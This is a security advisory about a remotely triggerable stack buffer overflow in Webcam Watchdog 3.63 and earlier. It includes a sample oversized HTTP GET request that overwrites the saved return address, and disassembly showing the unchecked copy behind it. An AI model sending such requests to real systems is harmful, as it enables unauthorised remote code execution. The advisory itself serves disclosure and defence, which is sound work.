|
Brought to you by:
Suppliers of:
|
|
|
| |
| Watchdog is "simply your best choice if you need to record video over a long time. You can setup Watchdog to initiate video recording when there's a motion detected. Watchdog can also alert you by emailing you the captured image and play the alarm sound". A vulnerability in the product allows remote users to overflow an internal buffer in the program, causing it to execute arbitrary code. |
| |
Credit:
The information has been provided by Peter Winter-Smith.
|
| |
Vulnerable systems:
* Webcam Watchdog version 3.63 and prior
Stack-based Buffer Overflow:
Webcam Watchdog is vulnerable to a remotely exploitable stack based buffer overflow which can be triggered via a simple overly long HTTP GET request on port 80/tcp.
A sample request is as follows:
---------------------------------------------------
GET /('a'x234)('BBBB')('XXXX') HTTP/1.1
User-Agent: WCSAXRView
Host: 127.0.0.1
Cache-Control: no-cache
---------------------------------------------------
The above request would cause the saved base pointer to be overwritten with 42424242h, and the saved return address to be overwritten with 58585858h.
Part of the Vulnerable Code:
It seems that the executable is compressed or encrypted, so to follow the steps detailed below it is best to load the executable and then trace the code in the memory, rather than try to disassemble the application beforehand.
At the address, 0040AEB0 a procedure located at offset 0040ADE8 is called. The return address 0040AEB5 is saved on the stack at the memory location 0012F900.
0040AEA9 56 PUSH ESI
0040AEAA 8BF1 MOV ESI,ECX
0040AEAC FF7424 08 PUSH DWORD PTR SS:[ESP+8]
0040AEB0 E8 33FFFFFF CALL Wsrv.0040ADE8
0040AEB5 8BC8 MOV ECX,EAX
In the procedure 0040ADE8, at line 0040AE2A, another procedure (0040B0FC) is called, leaving the return address 0040AE2F on the stack at 0012F6D8 (this saved return address is *not* overwritten however, and the procedure later returns without a problem).
0040AE2A E8 CD020000 CALL Wsrv.0040B0FC
0040AE2F 85C0 TEST EAX,EAX
In the procedure 0040B0FC, there is an unchecked string copying routine that copies a string (composed of 'Software\Webcam\WatchdogX.' + Our Requested WebPage String + '\mycapteng\ch0') into a buffer set out on the stack.
0040B161 8B5D 08 MOV EBX,DWORD PTR SS:[EBP+8]
0040B164 8BD1 MOV EDX,ECX
0040B166 2BD0 SUB EDX,EAX
0040B168 8A1C19 MOV BL,BYTE PTR DS:[ECX+EBX]
0040B16B 41 INC ECX
0040B16C 3B4D FC CMP ECX,DWORD PTR SS:[EBP-4]
0040B16F 885C3A FF MOV BYTE PTR DS:[EDX+EDI-1],BL
0040B173 ^7C EC JL SHORT Wsrv.0040B161
This causes the return address placed on the stack at 0012F900 by the call made from 0040AEB0 (which called the procedure 0040ADE8) to be completely overwritten.
The procedure 0040B0FC returns successfully, and code execution resumes from 0040AE2F. When the procedure 0040ADE8 returns, the overwritten saved return address is pop'ed off the stack into the instruction pointer register.
0040AE9F 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
0040AEA2 5F POP EDI
0040AEA3 5E POP ESI
0040AEA4 5B POP EBX
0040AEA5 C9 LEAVE
0040AEA6 C2 0400 RETN 4
This can be exploited to allow code execution to continue from an arbitrary address that we supply.
|
|
|
|
|
